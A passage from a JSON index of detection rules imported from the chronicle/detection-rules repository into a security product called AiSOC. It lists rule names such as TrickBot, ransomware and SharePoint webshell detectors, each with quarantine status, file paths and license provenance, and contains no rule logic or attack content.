"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-rdp-redirect-using-tscon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_rdp_redirect_using_tscon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_rdp_redirect_using_tscon.yaral" } }, { "id": "chronicle-detection-rules-suspicious-reconnaissance-activity", "type": "detection", "name": "suspicious_reconnaissance_activity", "description": "suspicious_reconnaissance_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-reconnaissance-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_reconnaissance_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_reconnaissance_activity.yaral" } }, { "id": "chronicle-detection-rules-suspicious-reconnaissance-activity-sysmon", "type": "detection", "name": "suspicious_reconnaissance_activity_sysmon", "description": "suspicious_reconnaissance_activity_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-reconnaissance-activity-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_reconnaissance_activity_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/suspicious_reconnaissance_activity__sysmon.yaral" } }, { "id": "chronicle-detection-rules-suspicious-run-key-from-download", "type": "detection", "name": "suspicious_run_key_from_download", "description": "suspicious_run_key_from_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-run-key-from-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_run_key_from_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_run_key_from_download.yaral" } }, { "id": "chronicle-detection-rules-suspicious-rundll32-activity", "type": "detection", "name": "suspicious_rundll32_activity", "description": "suspicious_rundll32_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-rundll32-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_rundll32_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_rundll32_activity.yaral" } }, { "id": "chronicle-detection-rules-suspicious-scheduled-task", "type": "detection", "name": "suspicious_scheduled_task", "description": "suspicious_scheduled_task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_scheduled_task", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_scheduled_task.yaral" } }, { "id": "chronicle-detection-rules-suspicious-schtasks-creation-possible-windows-0day-lpe-aka-polarbear-by-sandboxe", "type": "detection", "name": "suspicious_schtasks_creation_possible_windows_0day_lpe_aka_polarbear_by_sandboxescaper", "description": "suspicious_schtasks_creation_possible_windows_0day_lpe_aka_polarbear_by_sandboxescaper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-schtasks-creation-possible-windows-0day-lpe-aka-polarbear-by-sandboxe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_schtasks_creation_possible_windows_0day_lpe_aka_polarbear_by_sandboxescaper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/microsoft_sysmon/suspicious_schtasks_creation__possible_windows_0day_lpe_aka__polarbear__by_sandboxescaper.yaral" } }, { "id": "chronicle-detection-rules-suspicious-svchost-process-sysmon", "type": "detection", "name": "suspicious_svchost_process_sysmon", "description": "suspicious_svchost_process_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-svchost-process-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_svchost_process_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/suspicious_svchost_process__sysmon.yaral" } }, { "id": "chronicle-detection-rules-suspicious-sysvol-domain-group-policy-access", "type": "detection", "name": "suspicious_sysvol_domain_group_policy_access", "description": "suspicious_sysvol_domain_group_policy_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-sysvol-domain-group-policy-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_sysvol_domain_group_policy_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_sysvol_domain_group_policy_access.yaral" } }, { "id": "chronicle-detection-rules-suspicious-traffic-port-666", "type": "detection", "name": "suspicious_traffic_port_666", "description": "suspicious_traffic_port_666", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-traffic-port-666.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_traffic_port_666", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/traffic_port_666.yaral" } }, { "id": "chronicle-detection-rules-suspicious-typical-malware-back-connect-ports", "type": "detection", "name": "suspicious_typical_malware_back_connect_ports", "description": "suspicious_typical_malware_back_connect_ports", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-typical-malware-back-connect-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_typical_malware_back_connect_ports", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_typical_malware_back_connect_ports.yaral" } }, { "id": "chronicle-detection-rules-suspicious-unusual-location-lnk-file", "type": "detection", "name": "suspicious_unusual_location_lnk_file", "description": "suspicious_unusual_location_lnk_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-unusual-location-lnk-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_unusual_location_lnk_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/unusual_location_lnk_file.yaral" } }, { "id": "chronicle-detection-rules-suspicious-unusual-location-svchost-execution", "type": "detection", "name": "suspicious_unusual_location_svchost_execution", "description": "suspicious_unusual_location_svchost_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-unusual-location-svchost-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_unusual_location_svchost_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/unusual_location_svchost_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-unusual-location-svchost-write", "type": "detection", "name": "suspicious_unusual_location_svchost_write", "description": "suspicious_unusual_location_svchost_write", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-unusual-location-svchost-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_unusual_location_svchost_write", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/unusual_location_svchost_write.yaral" } }, { "id": "chronicle-detection-rules-suspicious-user-agent", "type": "detection", "name": "suspicious_user_agent", "description": "suspicious_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/suspicious_user_agent.yaral" } }, { "id": "chronicle-detection-rules-suspicious-wmi-execution", "type": "detection", "name": "suspicious_wmi_execution", "description": "suspicious_wmi_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-wmi-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_wmi_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_wmi_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-xor-encoded-powershell-command-line", "type": "detection", "name": "suspicious_xor_encoded_powershell_command_line", "description": "suspicious_xor_encoded_powershell_command_line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-xor-encoded-powershell-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_xor_encoded_powershell_command_line", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_xor_encoded_powershell_command_line.yaral" } }, { "id": "chronicle-detection-rules-swisyn-malware-detector-sysmon-behavior-august-2019", "type": "detection", "name": "swisyn_malware_detector_sysmon_behavior_august_2019", "description": "swisyn_malware_detector_sysmon_behavior_august_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/swisyn-malware-detector-sysmon-behavior-august-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "swisyn_malware_detector_sysmon_behavior_august_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/swisyn_malware_detector__sysmon_behavior___august_2019.yaral" } }, { "id": "chronicle-detection-rules-sysmon-service-enumeration", "type": "detection", "name": "sysmon_service_enumeration", "description": "sysmon_service_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sysmon-service-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sysmon_service_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/powershell/sysmon_service_enumeration.yaral" } }, { "id": "chronicle-detection-rules-sysmon-state-and-configuration-changed", "type": "detection", "name": "sysmon_state_and_configuration_changed", "description": "sysmon_state_and_configuration_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sysmon-state-and-configuration-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sysmon_state_and_configuration_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/sysmon_state_and_configuration_changed.yaral" } }, { "id": "chronicle-detection-rules-system-file-execution-location-anomaly", "type": "detection", "name": "system_file_execution_location_anomaly", "description": "system_file_execution_location_anomaly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/system-file-execution-location-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "system_file_execution_location_anomaly", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/system_file_execution_location_anomaly.yaral" } }, { "id": "chronicle-detection-rules-system-information-gathering-via-wmicexe", "type": "detection", "name": "system_information_gathering_via_wmicexe", "description": "system_information_gathering_via_wmicexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/system-information-gathering-via-wmicexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "system_information_gathering_via_wmicexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/system_information_gathering_via_wmic_exe.yaral" } }, { "id": "chronicle-detection-rules-t1053-005-windows-creation-of-scheduled-task", "type": "detection", "name": "T1053_005_windows_creation_of_scheduled_task", "description": "T1053_005_windows_creation_of_scheduled_task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/t1053-005-windows-creation-of-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "T1053_005_windows_creation_of_scheduled_task", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1053_005_windows_creation_of_scheduled_task.yaral" } }, { "id": "chronicle-detection-rules-t1214-credentials-in-registry", "type": "detection", "name": "t1214__credentials_in_registry", "description": "t1214__credentials_in_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/t1214-credentials-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "t1214__credentials_in_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/t1214___credentials_in_registry.yaral" } }, { "id": "chronicle-detection-rules-ta505-group-targets-the-us-retail-industry-sysmon", "type": "detection", "name": "ta505_group_targets_the_us_retail_industry_sysmon", "description": "ta505_group_targets_the_us_retail_industry_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ta505-group-targets-the-us-retail-industry-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ta505_group_targets_the_us_retail_industry_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/ta505_group_targets_the_us_retail_industry__sysmon.yaral" } }, { "id": "chronicle-detection-rules-terminal-service-process-spawn", "type": "detection", "name": "terminal_service_process_spawn", "description": "terminal_service_process_spawn", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/terminal-service-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "terminal_service_process_spawn", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/process_creation/terminal_service_process_spawn.yaral" } }, { "id": "chronicle-detection-rules-the-gocgle-malicious-campaign", "type": "detection", "name": "the_gocgle_malicious_campaign", "description": "the_gocgle_malicious_campaign", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/the-gocgle-malicious-campaign.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "the_gocgle_malicious_campaign", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/cloud_security/proxy/the_gocgle_malicious_campaign.yaral" } }, { "id": "chronicle-detection-rules-trickbot-behaviour-privilege-escalation-attack", "type": "detection", "name": "trickbot_behaviour_privilege_escalation_attack", "description": "trickbot_behaviour_privilege_escalation_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/trickbot-behaviour-privilege-escalation-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "trickbot_behaviour_privilege_escalation_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/trickbot_behaviour__privilege_escalation_attack.yaral" } }, { "id": "chronicle-detection-rules-trickbot-malware-detector-sysmon-behavior-july-2019", "type": "detection", "name": "trickbot_malware_detector_sysmon_behavior_july_2019", "description": "trickbot_malware_detector_sysmon_behavior_july_2019", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/trickbot-malware-detector-sysmon-behavior-july-2019.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "trickbot_malware_detector_sysmon_behavior_july_2019", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/trickbot_malware_detector__sysmon_behavior___july_2019.yaral" } }, { "id": "chronicle-detection-rules-troldesh-ransomware-detector-sysmon", "type": "detection", "name": "troldesh_ransomware_detector_sysmon", "description": "troldesh_ransomware_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/troldesh-ransomware-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "troldesh_ransomware_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/troldesh_ransomware_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-ttp-sharepoint-cve-2025-49706-exploitation", "type": "detection", "name": "ttp_sharepoint_cve_2025_49706_exploitation", "description": "ttp_sharepoint_cve_2025_49706_exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-sharepoint-cve-2025-49706-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_sharepoint_cve_2025_49706_exploitation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_sharepoint_cve_2025_49706_exploitation.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-sharepoint-cve-2025-53770-webshell-attempted", "type": "detection", "name": "ttp_windows_sharepoint_cve_2025_53770_webshell_attempted", "description": "ttp_windows_sharepoint_cve_2025_53770_webshell_attempted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-sharepoint-cve-2025-53770-webshell-attempted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_sharepoint_cve_2025_53770_webshell_attempted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/sharepoint/ttp_windows_sharepoint_cve_2025_53770_webshell_attempted.yaral" } }, { "id": "chronicle-detection-rules-ttp-windows-sharepoint-cve-2025-53770-webshell-succeeded", "type": "detection", "name": "ttp_windows_sharepoint_cve_2025_53770_webshell_succeeded", "description": "ttp_windows_sharepoint_cve_2025_53770_webshell_succeeded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ttp-windows-sharepoint-cve-2025-53770-webshell-succeeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ttp_windows_sharepoint_cve_2025_53770_webshell_succeeded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 